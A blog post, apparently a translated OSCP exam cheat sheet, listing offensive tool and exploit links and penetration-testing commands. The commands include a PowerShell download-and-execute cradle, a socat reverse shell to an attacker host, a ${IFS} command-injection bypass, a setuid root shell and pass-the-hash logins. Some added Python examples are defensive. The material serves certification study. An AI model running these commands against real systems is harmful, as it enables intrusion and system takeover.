Offensive Security Certification Cheat Sheet (translated) - version 2023.3.11

About these notes:

These notes are the cheat sheet that the offensive security enthusiast 0xsyr0 maintains on GitHub. I translated the annotated content in full and, based on my own study, added or removed some material. I am publishing it on my blog for later review and as a reference for the other security enthusiasts who visit.

Commands, payloads and resources for the OffSec Certified Professional (OSCP) certification.

Disclaimer: A guy on Twitter made a valid point. Automated exploitation tools such as sqlmap are prohibited in the exam. The same applies to the automated exploitation features of LinPEAS. I have not kept track of the current guidelines related to these tools. I therefore want to point out that I am not responsible if someone fails the exam because they used a tool without double-checking the latest exam restrictions. Inform yourself before taking the exam!

Common tool download links

Name URL
chisel https://github.com/jpillora/chisel
CyberChef https://gchq.github.io/CyberChef
ligolo-ng https://github.com/nicocha30/ligolo-ng
swaks https://github.com/jetmore/swaks

Information gathering tools

Name URL
nmap https://github.com/nmap/nmap

Vulnerability analysis tools

Name URL
nikto https://github.com/sullo/nikto
sparta https://github.com/SECFORCE/sparta

Web application analysis tools

Name URL
ffuf https://github.com/ffuf/ffuf
fpmvuln https://github.com/hannob/fpmvuln
gobuster https://github.com/OJ/gobuster
JSON Web Tokens https://jwt.io
jwt_tool https://github.com/ticarpi/jwt_tool
leaky-paths https://github.com/ayoubfathi/leaky-paths
PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings
php_filter_chain_generator https://github.com/synacktiv/php_filter_chain_generator
PHPGGC https://github.com/ambionics/phpggc
spose https://github.com/aancw/spose
wfuzz https://github.com/xmendez/wfuzz
whatweb https://github.com/urbanadventurer/WhatWeb
wpscan https://github.com/wpscanteam/wpscan

Database assessment tools

Name URL
RedisModules-ExecuteCommand https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
redis-rce https://github.com/Ridter/redis-rce
redis-rogue-server https://github.com/n0b0dyCN/redis-rogue-server

Password attack tools

Name URL
Crackmapexec https://github.com/byt3bl33d3r/CrackMapExec
DefaultCreds-cheat-sheet https://github.com/ihebski/DefaultCreds-cheat-sheet
firefox_decrypt https://github.com/unode/firefox_decrypt
hashcat https://hashcat.net/hashcat
hydra https://github.com/vanhauser-thc/thc-Hydra
john https://github.com/openwall/john
keepass-dump-masterkey https://github.com/CMEPW/keepass-dump-masterkey
KeePwn https://github.com/Orange-Cyberdefense/KeePwn
kerbrute https://github.com/ropnop/kerbrute
lazagne https://github.com/AlessandroZ/LaZagne
mimikatz https://github.com/gentilkiwi/mimikatz
netexec https://github.com/Pennyw0rth/NetExec
ntlm.pw https://ntlm.pw
pypykatz https://github.com/skelsec/pypykatz

Exploitation tools

Name URL
evil-winrm https://github.com/Hackplayers/evil-winrm
metasploit https://github.com/rapid7/metasploit-framework

Internal network and Active Directory tools

Name URL
ADCSKiller https://github.com/grimlockx/ADCSKiller
ADCSTemplate https://github.com/GoateePFE/ADCSTemplate
AD_Miner https://github.com/Mazars-Tech/AD_Miner
docker-bloodhound https://github.com/belane/docker-bloodhound
bloodhound https://github.com/BloodHoundAD/BloodHound
bloodhound https://github.com/ly4k/BloodHound
bloodhound.py https://github.com/dirkjanm/BloodHound.py
certify https://github.com/GhostPack/Certify
certipy https://github.com/ly4k/Certipy
enum4linux-ng https://github.com/cddmp/enum4linux-ng
Ghostpack-CompiledBinaries https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
GTFOBins https://gtfobins.github.io
impacket https://github.com/fortra/impacket
impacket_static_binaries https://github.com/ropnop/impacket_static_binaries
jaws https://github.com/411Hall/JAWS
krbrelay https://github.com/cube0x0/KrbRelay
Krbrelayup https://github.com/Dec0ne/KrbRelayUp
krbrelayx https://github.com/dirkjanm/krbrelayx
lapsdumper https://github.com/n00py/LAPSDumper
linux-exploit-suggester https://github.com/The-Z-Labs/linux-exploit-suggester
linenum https://github.com/rebootuser/LinEnum
lsassy https://github.com/Hackndo/lsassy
nanodump https://github.com/helpsystems/nanodump
passthecert https://github.com/AlmondOffSec/PassTheCert
PEASS-ng https://github.com/carlospolop/PEASS-ng
PKINITtools https://github.com/dirkjanm/PKINITtools
powercat https://github.com/besimorhino/powercat
powersharppack https://github.com/S3cur3Th1sSh1t/PowerSharpPack
powerup.ps1 https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
powerview.ps1 https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
PowerView.py https://github.com/aniqfakhrul/powerview.py
PPLdump https://github.com/itm4n/PPLdump
Priv2admin https://github.com/gtworek/Priv2Admin
PSPKIAaudit https://github.com/GhostPack/PSPKIAudit
pspy https://github.com/DominicBreuker/pspy
pth-toolkit https://github.com/byt3bl33d3r/pth-toolkit
pwncat https://github.com/calebstewart/pwncat
pywhisker https://github.com/ShutdownRepo/pywhisker
rubeus https://github.com/GhostPack/Rubeus
runascs https://github.com/antonioCoco/RunasCs
rusthound https://github.com/OPENCYBER-FR/RustHound
scavenger https://github.com/SpiderLabs/scavenger
sharpadws https://github.com/wh0amitz/SharpADWS
sharpcollection https://github.com/Flangvik/SharpCollection
sharpchromium https://github.com/djhohnstein/SharpChromium
sharphound https://github.com/BloodHoundAD/SharpHound
sharpview https://github.com/tevora-threat/SharpView
sherlock https://github.com/rasta-mouse/Sherlock
wadcoms https://wadcoms.github.io
watson https://github.com/rasta-mouse/Watson
wesng https://github.com/bitsadmin/wesng
whisker https://github.com/eladshamir/Whisker
windows-privesc-check https://github.com/pentestmonkey/windows-privesc-check
Windows Privilege Escalation Fundamentals https://www.fuzzysecurity.com/tutorials/16.html
Windows-Privilege-Escalation https://github.com/frizb/Windows-Privilege-Escalation

Exploit databases

Database URL
0day.today Exploit Database https://0day.today
Exploit Database https://www.exploit-db.com
Packet Storm https://packetstormsecurity.com
Sploitus https://sploitus.com

CVE exploit tools

CVE Description URL
CVE-2014-6271 Shocker RCE https://github.com/nccgroup/shocker
CVE-2014-6271 Shellshock RCE PoC https://github.com/zalalov/CVE-2014-6271
CVE-2014-6271 Shellshocker RCE PoC https://github.com/mubix/shellshocker-pocs
CVE-2016-5195 Dirty COW LPE https://github.com/firefart/dirtycow
CVE-2016-5195 Dirty COW '/proc/self/mem' race condition (/etc/passwd method) LPE https://www.exploit-db.com/exploits/40847
CVE-2016-5195 Dirty COW 'PTRACE_POKEDATA' race condition (/etc/passwd method) LPE https://www.exploit-db.com/exploits/40839
CVE-2017-0144 EternalBlue (MS17-010) RCE https://github.com/d4t4s3c/Win7Blue
CVE-2017-0199 RTF Dynamite RCE https://github.com/bhdresh/CVE-2017-0199
CVE-2018-7600 Drupalgeddon 2 RCE https://github.com/g0rx/CVE-2018-7600-Drupal-RCE
CVE-2018-10933 libSSH Authentication Bypass https://github.com/blacknbunny/CVE-2018-10933
CVE-2018-16509 Ghostscript PIL RCE https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509
CVE-2019-14287 Sudo Bypass LPE https://github.com/n0w4n/CVE-2019-14287
CVE-2019-18634 Sudo Buffer Overflow LPE https://github.com/saleemrashid/sudo-cve-2019-18634
CVE-2019-5736 RunC Container Escape PoC https://github.com/Frichetten/CVE-2019-5736-PoC
CVE-2019-6447 ES File Explorer Open Port Arbitrary File Read https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
CVE-2019-7304 dirty_sock LPE https://github.com/initstring/dirty_sock
CVE-2020-0796 SMBGhost RCE PoC https://github.com/chompie1337/SMBGhost_RCE_PoC
CVE-2020-1472 ZeroLogon PE Checker & Exploitation Code https://github.com/VoidSec/CVE-2020-1472
CVE-2020-1472 ZeroLogon PE Exploitation Script https://github.com/risksense/zerologon
CVE-2020-1472 ZeroLogon PE PoC https://github.com/dirkjanm/CVE-2020-1472
CVE-2020-1472 ZeroLogon PE Testing Script https://github.com/SecuraBV/CVE-2020-1472
CVE-2021-1675, CVE-2021-34527 PrintNightmare LPE RCE https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527
CVE-2021-1675 PrintNightmare LPE RCE (PowerShell implementation) https://github.com/calebstewart/CVE-2021-1675
CVE-2021-21972 vCenter RCE https://github.com/horizon3ai/CVE-2021-21972
CVE-2021-22204 ExifTool Command Injection RCE https://github.com/AssassinUKG/CVE-2021-22204
CVE-2021-22204 GitLab ExifTool RCE https://github.com/CsEnox/Gitlab-Exiftool-RCE
CVE-2021-22204 GitLab ExifTool RCE (Python implementation) https://github.com/conisolabs/CVE-2021-22204-exiftool
CVE-2021-26085 Confluence Server RCE https://github.com/Phuong39/CVE-2021-26085
CVE-2021-27928 MariaDB/MySQL wsrep Provider RCE https://github.com/Al1ex/CVE-2021-27928
CVE-2021-3129 Laravel Framework RCE https://github.com/nth347/CVE-2021-3129_exploit
CVE-2021-3156 sudo / sudoedit LPE https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit
CVE-2021-3156 sudo / sudoedit LPE PoC https://github.com/blasty/CVE-2021-3156
CVE-2021-3493 OverlayFS Ubuntu Kernel Exploit LPE https://github.com/briskets/CVE-2021-3493
CVE-2021-3560 polkit LPE (C implementation) https://github.com/hakivvi/CVE-2021-3560
CVE-2021-3560 polkit LPE https://github.com/Almorabea/Polkit-exploit
CVE-2021-3560 polkit LPE PoC https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
CVE-2021-36934 HiveNightmare LPE https://github.com/GossiTheDog/HiveNightmare
CVE-2021-36942 PetitPotam https://github.com/topotam/PetitPotam
CVE-2021-36942 DFSCoerce https://github.com/Wh04m1001/DFSCoerce
CVE-2021-4034 PwnKit Pkexec Self-contained Exploit LPE https://github.com/ly4k/PwnKit
CVE-2021-4034 PwnKit Pkexec LPE PoC (1) https://github.com/dzonerzy/poc-cve-2021-4034
CVE-2021-4034 PwnKit Pkexec LPE PoC (2) https://github.com/arthepsy/CVE-2021-4034
CVE-2021-4034 PwnKit Pkexec LPE PoC (3) https://github.com/nikaiw/CVE-2021-4034
CVE-2021-41379 InstallerFileTakeOver LPE (0-day) (archived) https://github.com/klinix5/InstallerFileTakeOver
CVE-2021-41379 InstallerFileTakeOver LPE (0-day) (fork) https://github.com/waltlin/CVE-2021-41379-With-Public-Exploit-Lets-You-Become-An-Admin-InstallerFileTakeOver
CVE-2021-41773, CVE-2021-42013, CVE-2020-17519 Simple Apache Path Traversal (0-day) https://github.com/MrCl0wnLab/SimplesApachePathTraversal
CVE-2021-42278, CVE-2021-42287 sam-the-admin, sAMAccountName spoofing / Domain Admin impersonation PE https://github.com/WazeHell/sam-the-admin
CVE-2021-42278 sam-the-admin, sAMAccountName spoofing / Domain Admin impersonation PE (Python implementation) https://github.com/ly4k/Pachine
CVE-2021-42287, CVE-2021-42278 noPac LPE (1) https://github.com/cube0x0/noPac
CVE-2021-42287, CVE-2021-42278 noPac LPE (2) https://github.com/Ridter/noPac
CVE-2021-42321 Microsoft Exchange Server RCE https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398
CVE-2021-44228 Log4Shell RCE (0-day) https://github.com/kozmer/log4j-shell-poc
CVE-2021-44228 Log4Shell RCE (0-day) https://github.com/welk1n/JNDI-Injection-Exploit
CVE-2022-0847 DirtyPipe Exploits LPE https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
CVE-2022-21999 SpoolFool, Windows Print Spooler LPE https://github.com/ly4k/SpoolFool
CVE-2022-22963 Spring4Shell RCE (0-day) https://github.com/tweedge/springcore-0day-en
CVE-2022-23119, CVE-2022-23120 Trend Micro Deep Security Agent for Linux Arbitrary File Read https://github.com/modzero/MZ-21-02-Trendmicro
CVE-2022-24715 Icinga Web 2 Authenticated RCE https://github.com/JacobEbben/CVE-2022-24715
CVE-2022-26134 ConfluencePwn RCE (0-day) https://github.com/redhuntlabs/ConfluencePwn
CVE-2022-31214 Firejail / Firejoin LPE https://seclists.org/oss-sec/2022/q2/188
CVE-2022-31214 Firejail / Firejoin LPE https://www.openwall.com/lists/oss-security/2022/06/08/10
CVE-2022-34918 Netfilter Kernel Exploit LPE https://github.com/randorisec/CVE-2022-34918-LPE-PoC
CVE-2022-46169 Cacti Authentication Bypass RCE https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit
CVE-2023-21746 Windows NTLM EoP LocalPotato LPE https://github.com/decoder-it/LocalPotato
CVE-2023-21768 Windows Ancillary Function Driver for WinSock LPE PoC https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768
CVE-2023-21817 Kerberos Unlock LPE PoC https://gist.github.com/monoxgas/f615514fb51ebb55a7229f3cf79cf95b
CVE-2023-22809 sudoedit LPE https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
CVE-2023-23752 Joomla Unauthenticated Information Disclosure https://github.com/Acceis/exploit-CVE-2023-23752
CVE-2023-25690 Apache mod_proxy HTTP Request Smuggling PoC https://github.com/dhmosfunk/CVE-2023-25690-POC
CVE-2023-28879 Shell in the Ghost: Ghostscript RCE PoC https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce
CVE-2023-32233 Use-After-Free in Netfilter nf_tables LPE https://github.com/Liuk3r/CVE-2023-32233
CVE-2023-32629, CVE-2023-2640 GameOverlay Ubuntu Kernel Exploit LPE (0-day) https://twitter.com/liadeliyahu/status/1684841527959273472?s=09
CVE-2023-36874 Windows Error Reporting Service LPE (0-day) https://github.com/Wh04m1001/CVE-2023-36874
CVE-2023-51467, CVE-2023-49070 Apache OFBiz Authentication Bypass https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
CVE-2023-7028 GitLab Account Takeover https://github.com/V1lu0/CVE-2023-7028
CVE-2023-7028 GitLab Account Takeover https://github.com/Vozec/CVE-2023-7028
N/A dompdf RCE (0-day) https://github.com/positive-security/dompdf-rce
N/A dompdf XSS to RCE (0-day) https://positive.security/blog/dompdf-rce
N/A StorSvc LPE https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc
N/A ADCSCoercePotato https://github.com/decoder-it/ADCSCoercePotato
N/A CoercedPotato LPE https://github.com/Prepouce/CoercedPotato
N/A DCOMPotato LPE https://github.com/zcgonvh/DCOMPotato
N/A GenericPotato LPE https://github.com/micahvandeusen/GenericPotato
N/A GodPotato LPE https://github.com/BeichenDream/GodPotato
N/A Juicy Potato LPE https://github.com/ohpe/juicy-potato
N/A JuicyPotatoNG LPE https://github.com/antonioCoco/JuicyPotatoNG
N/A MultiPotato LPE https://github.com/S3cur3Th1sSh1t/MultiPotato
N/A RemotePotato0 PE https://github.com/antonioCoco/RemotePotato0
N/A RoguePotato LPE https://github.com/antonioCoco/RoguePotato
N/A RottenPotatoNG LPE https://github.com/breenmachine/RottenPotatoNG
N/A SharpEfsPotato LPE https://github.com/bugch3ck/SharpEfsPotato
N/A SweetPotato LPE https://github.com/CCob/SweetPotato
N/A SweetPotato LPE https://github.com/uknowsec/SweetPotato
N/A S4UTomato LPE https://github.com/wh0amitz/S4UTomato
N/A PrintSpoofer LPE (1) https://github.com/dievus/printspoofer
N/A PrintSpoofer LPE (2) https://github.com/itm4n/PrintSpoofer
N/A Shocker Container Escape https://github.com/gabrtv/shocker
N/A SystemNightmare PE https://github.com/GossiTheDog/SystemNightmare
N/A NoFilter LPE https://github.com/deepinstinct/NoFilter
N/A OfflineSAM LPE https://github.com/gtworek/PSBits/tree/master/OfflineSAM
N/A OfflineAddAdmin2 LPE https://github.com/gtworek/PSBits/tree/master/OfflineSAM/OfflineAddAdmin2
N/A Kernelhub https://github.com/Ascotbe/Kernelhub
N/A Windows Kernel Exploits https://github.com/SecWiki/windows-kernel-exploits
N/A Precompiled Windows Exploits https://github.com/abachy17/WindowsExploits

Payloads

Name URL
Payload Box https://github.com/payloadbox
PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings
phpggc https://github.com/ambionics/phpggc
PHP Reverse Shell https://github.com/ivan-sincek/php-reverse-shell
webshell https://github.com/tennc/webshell
web-shells https://github.com/TheBinitGhimire/Web-Shells

Wordlists and wordlist generators

Name URL
bopscrk https://github.com/R3nt0n/bopscrk
cewl https://github.com/digininja/cewl
cook https://github.com/giteshnxtlvl/cook
cupp https://github.com/Mebus/cupp
kerberos_enum_userlists https://github.com/attackdebris/kerberos_enum_userlists
SecLists https://github.com/danielmiessler/SecLists
username-anarchy https://github.com/urbanadventurer/username-anarchy

Social media resources

Name URL
OSCP Guide 01/12 – My Exam Experience https://www.youtube.com/watch?v=9mrf-WyzkpE&list=PLJnLaWkc9xRgOyupMhNiVFfgvxseWDH5x
HTB write-up collection https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
HackTricks https://book.hacktricks.xyz/
Hacking Articles https://www.hackingarticles.in/
IppSec (YouTube) https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
IppSec.rocks https://ippsec.rocks/?#
0xdf https://0xdf.gitlab.io/

Exam command cheat sheet

Basic commands

curl

curl -v http://<DOMAIN>    // verbose output
curl -X POST http://<DOMAIN>    // use POST method
curl -X PUT http://<DOMAIN>    // use PUT method
curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd    // use --path-as-is to handle /../ or /./ in the given URL
curl --proxy http://127.0.0.1:8080    // use proxy
curl -F myFile=@<FILE> http://<RHOST>    // file upload
curl${IFS}<LHOST>/<FILE>    // Internal Field Separator (IFS) example
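The ${IFS} line above is a filter bypass: a blacklist that only rejects literal spaces lets it through, because the shell expands ${IFS} to whitespace after the check has run. The following Python is an added example (not part of the original cheat sheet) that puts such a naive filter next to the two things that actually hold up: an allowlist for the value and an argument vector instead of a shell string. The inputs are constructed and nothing is executed.

```python
import re

# Constructed inputs, not from the original page. The second carries the
# ${IFS} trick shown in the curl line; the third is the same with a literal space.
SAMPLE_INPUTS = [
    "example.com",
    "example.com;curl${IFS}10.0.0.5/x",
    "example.com; curl 10.0.0.5/x",
]

# Hostname or dotted IPv4 only: letters, digits, dots and hyphens, 1..253 chars.
_HOST_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def naive_space_filter(user_input: str) -> bool:
    """A blacklist that rejects literal spaces only.

    ${IFS} contains no space character, so it passes; bash expands it to
    whitespace when the concatenated command string is finally executed.
    """
    return " " not in user_input


def expand_ifs(user_input: str) -> str:
    """Approximate what the shell sees: ${IFS} defaults to space/tab/newline."""
    return user_input.replace("${IFS}", " ").replace("$IFS", " ")


def strict_hostname_ok(user_input: str) -> bool:
    """Allowlist check: the whole value must look like a hostname or IPv4 address."""
    return _HOST_RE.fullmatch(user_input) is not None


def build_ping_argv(host: str) -> list:
    """Argument vector for subprocess.run(argv) without shell=True.

    ping receives the host as a single argument, so ';', '$' and ${IFS} are
    never interpreted; the allowlist rejects them before that point anyway.
    """
    if not strict_hostname_ok(host):
        raise ValueError("rejected host argument: %r" % host)
    return ["ping", "-c", "1", host]


def compare_filters(inputs=SAMPLE_INPUTS) -> list:
    """(passes naive blacklist, passes allowlist) for every input."""
    return [(naive_space_filter(i), strict_hostname_ok(i)) for i in inputs]
```

compare_filters() returns (True, False) for the ${IFS} input: the blacklist accepts it, the allowlist does not. The detection side is the same lesson in reverse: grep for the literal string "${IFS}" (and "$IFS") in web access logs, because legitimate clients have no reason to send it.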

chisel

Reverse pivot
./chisel server -p 9002 -reverse -v
./chisel client <LHOST>:9002 R:3000:127.0.0.1:3000

SOCKS5 / Proxychains
./chisel server -p 9002 -reverse -v
./chisel client <LHOST>:9002 R:socks

File transfer methods

certutil: download a file
certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>

netcat: transfer a file
nc -lnvp <LPORT> < <FILE>
nc <RHOST> <RPORT> > <FILE>

impacket-smbserver: transfer a file
sudo impacket-smbserver <SHARE> ./
sudo impacket-smbserver <SHARE> . -smb2support
copy * \\<LHOST>\<SHARE>

PowerShell: transfer a file
iwr <LHOST>/<FILE> -o <FILE>
IEX(IWR http://<LHOST>/<FILE> -UseBasicParsing)
powershell -command Invoke-WebRequest -Uri http://<LHOST>:<LPORT>/<FILE> -Outfile C:\\temp\\<FILE>
Bash-only file transfer

wget function version

Paste directly into the shell:

function __wget() {
    : ${DEBUG:=0}
    local URL=$1
    local tag="Connection: close"
    local mark=0

    if [ -z "${URL}" ]; then
        printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]" \
            "${FUNCNAME[0]}" "${FUNCNAME[0]}"
        return 1;
    fi
    # replace every "/" with a space and split the URL into scheme, host[:port] and path
    read proto server path <<<$(echo ${URL//// })
    DOC=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    # without an explicit ":port" HOST and PORT are identical, so default to 80
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
    [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST"
    [[ $DEBUG -eq 1 ]] && echo "PORT=$PORT"
    [[ $DEBUG -eq 1 ]] && echo "DOC =$DOC"

    # open a TCP connection through bash's /dev/tcp pseudo-device on file descriptor 3
    exec 3<>/dev/tcp/${HOST}/$PORT
    echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3
    # print the response only after the "Connection: close" header has been seen;
    # a server that does not echo this header back produces no output
    while read line; do
        [[ $mark -eq 1 ]] && echo "$line"
        if [[ "${line}" =~ "${tag}" ]]; then
            mark=1
        fi
    done <&3
    exec 3>&-
}

Download a file with the function defined above:

__wget http://<LHOST>/<FILE>

curl function version

function __curl() {
    # split the URL into scheme, host[:port] and path
    read proto server path <<<$(echo ${1//// })
    DOC=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

    exec 3<>/dev/tcp/${HOST}/$PORT
    echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
    # skip the response headers up to the empty line, then dump the body unchanged
    (while read line; do
        [[ "$line" == $'\r' ]] && break
    done && cat) <&3
    exec 3>&-
}

Download a file with the function defined above:

__curl http://<LHOST>/<FILE> > <OUTPUT_FILE>

File transfer over FTP

ftp <RHOST>
wget -r ftp://anonymous:anonymous@<RHOST>

Kerberos (KDC, Key Distribution Center)

sudo apt-get install krb5-kdc

Request a TGT for a domain account and import it locally:

impacket-getTGT <DOMAIN>/<USERNAME>:'<PASSWORD>'
export KRB5CCNAME=<FILE>.ccache    # import the ticket
export KRB5CCNAME=$(realpath <FILE>.ccache)    # the same, with an absolute path

Standard Kerberos commands:

/etc/krb5.conf    // Kerberos configuration file
kinit <USERNAME>    // request a ticket
klist    // list the available Kerberos tickets
kdestroy    // destroy the cached Kerberos tickets
.k5login    // Kerberos principals allowed to log in (lives in the home directory)
krb5.keytab    // "key table" file for one or more principals
kadmin    // Kerberos administration console
add_principal <EMAIL>    // add a new user to the keytab file
ksu    // run a command with Kerberos authentication
klist -k /etc/krb5.keytab    // list the contents of the keytab file
kadmin -p kadmin/<EMAIL> -k -t /etc/krb5.keytab    // enable editing of the keytab file

ligolo-ng | VPN-like tunnelling proxy

Tool: https://github.com/nicocha30/ligolo-ng

Download the proxy (server) and the agent (client)
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

Prepare the tunnel interface
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

Set up the proxy on the attacker machine
./proxy -laddr <LHOST>:443 -selfcert

Run the agent on the target machine
./agent -connect <LHOST>:443 -ignore-cert
Session handling

List the sessions received and select one:

ligolo-ng » session

Show the target's network configuration:

[Agent : user@target] » ifconfig

Add a route to the target network on the attacker machine:

sudo ip r add 172.16.1.0/24 dev ligolo

Start the tunnel:

[Agent : user@target] » start

Linux

Start a shell as another user
doas -u <USERNAME> /bin/sh

Set an environment variable
export PATH=`pwd`:$PATH

Compile exploit source code into an executable
gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit    # Linux, 32-bit
i686-w64-mingw32-gcc -o main32.exe main.c    # Windows, 32-bit (mingw cross compiler)
x86_64-w64-mingw32-gcc -o main64.exe main.c    # Windows, 64-bit (mingw cross compiler)

Show the access control list of a file or directory
getfacl <LOCAL_DIRECTORY>

Convert a string to UTF-16LE and Base64-encode it
echo "<COMMAND>" | iconv -t UTF-16LE | base64 -w 0
echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
iconv -f ASCII -t UTF-16LE <FILE>.txt | base64 | tr -d "\n"

vi privilege escalation
:w !sudo tee %    # save the file with elevated privile
ges without leaving vi

Windows command formatting
echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
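The iconv/base64 one-liners above produce the UTF-16LE Base64 form that PowerShell expects for -EncodedCommand. The following Python is an added example (not from the original cheat sheet) that performs the same encoding and, more usefully for a defender, decodes such blobs out of a logged command line; the log line is constructed.

```python
import base64
import re

# -e, -ec, -en, -enc and the full -EncodedCommand are all accepted by
# PowerShell, so match any of them followed by a Base64 run.
_ENC_FLAG = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def encode_powershell_command(command: str) -> str:
    """Same transformation as the iconv | base64 -w 0 one-liners above:
    UTF-16LE bytes, Base64 encoded, no line wrapping."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Reverse the transformation. PowerShell's -EncodedCommand argument is
    always UTF-16LE Base64, so the plaintext is recoverable from any log
    that captured the command line."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def extract_encoded_commands(log_line: str) -> list:
    """Decode every -enc/-EncodedCommand argument found in a logged command
    line. Blobs that are not valid Base64 are skipped rather than raising."""
    decoded = []
    for blob in _ENC_FLAG.findall(log_line):
        try:
            decoded.append(decode_encoded_command(blob))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


# Constructed sample (Sysmon-style process creation field, not a real capture).
SAMPLE_COMMAND = "Get-Process | Out-File C:\\temp\\procs.txt"
SAMPLE_LOG = (
    "CommandLine: powershell.exe -nop -w hidden -enc "
    + encode_powershell_command(SAMPLE_COMMAND)
)
```

Note that the echo-based one-liners include the trailing newline echo adds, so the decoded text ends in "\n"; echo -n avoids that. Alerting on process-creation events where the decoded command contains Invoke-WebRequest, IEX or DownloadString catches the download cradles listed in the file transfer section above regardless of how they were encoded.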

Microsoft Windows

List local files
dir /a
dir /a:d
dir /a:h
dir flag* /s /p
dir /s /b *.log

Start a web server with PHP

sudo php -S 127.0.0.1:80

Ping a target to test connectivity

ping -c 1 <RHOST>
ping -n 1 <RHOST>

Start a web server with Python

sudo python -m SimpleHTTPServer 80
sudo python3 -m http.server 80

Log in to a Windows host with xfreerdp or rdesktop

xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> /dynamic-resolution +clipboard
xfreerdp /v:<RHOST> /u:<USERNAME> /d:<DOMAIN> /pth:'<HASH>' /dynamic-resolution +clipboard
rdesktop <RHOST>
xfreerdp /v:<RHOST> /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla

showmount

# list the directories exported by the remote NFS server <RHOST>
/usr/sbin/showmount -e <RHOST>
# the same, run as root
sudo showmount -e <RHOST>
# change the owner of the file and set the setuid/setgid bits (+s)
chown root:root sid-shell; chmod +s sid-shell

Mount a remote file system (SMB share on the target)

# mount a CIFS (Common Internet File System, the SMB-based network file sharing protocol) share
mount.cifs //<RHOST>/<SHARE> /mnt/remote
# mount a directory from a virtual machine disk image read-only at a local mount point (virtualisation environments)
guestmount --add '/<MOUNTPOINT>/<DIRECTORY/FILE>' --inspector --ro /mnt/<MOUNT> -v

smbclient

smbclient -L \\<RHOST>\ -N
smbclient -L //<RHOST>/ -N
smbclient -L ////<RHOST>/ -N
smbclient -L //<RHOST>// -U <USERNAME>%<PASSWORD>
smbclient -U "<USERNAME>" -L \\\\<RHOST>\\
smbclient //<RHOST>/<SHARE> -U <USERNAME>
smbclient //<RHOST>/SYSVOL -U <USERNAME>%<PASSWORD>
smbclient "\\\\<RHOST>\<SHARE>"
smbclient \\\\<RHOST>\\<SHARE> -U '<USERNAME>' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
smbclient --no-pass //<RHOST>/<SHARE>

Download multiple files at once (inside the smbclient session)
mask ""
recurse ON
prompt OFF
mget *

socat port forwarding

# forward traffic on a local port to a port on a remote host
socat TCP-LISTEN:<LPORT>,fork TCP:<RHOST>:<RPORT>

# catch an interactive reverse shell from the target
socat file:`tty`,raw,echo=0 tcp-listen:<LPORT>
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<LHOST>:<LPORT>

# listen on a local port and forward the traffic to a port on a remote host or on the local machine
socat tcp-listen:5986,reuseaddr,fork tcp:<RHOST>:9002
socat tcp-listen:9002,reuseaddr,fork tcp:192.168.122.228:5968 &

SSH port forwarding

ssh user@<RHOST> -oKexAlgorithms=+diffie-hellman-group1-sha1

ssh -R 8080:<LHOST>:80 <RHOST>
ssh -L 8000:127.0.0.1:8000 <USERNAME>@<RHOST>
ssh -N -L 1234:127.0.0.1:1234 <USERNAME>@<RHOST>

ssh -L 80:<LHOST>:80 <RHOST>
ssh -L 127.0.0.1:80:<LHOST>:80 <RHOST>
ssh -L 80:localhost:80 <RHOST>

Time and date

Get the server time
sudo nmap -sU -p 123 --script ntp-info <RHOST>

Stop virtualbox-guest-utils to stop time synchronisation
sudo /etc/init.d/virtualbox-guest-utils stop

Stop systemd-timesyncd to synchronise the time manually
sudo systemctl stop systemd-timesyncd

Disable automatic synchronisation
sudo systemctl disable --now chronyd

Options for setting the date and time
sudo net time -c <RHOST>
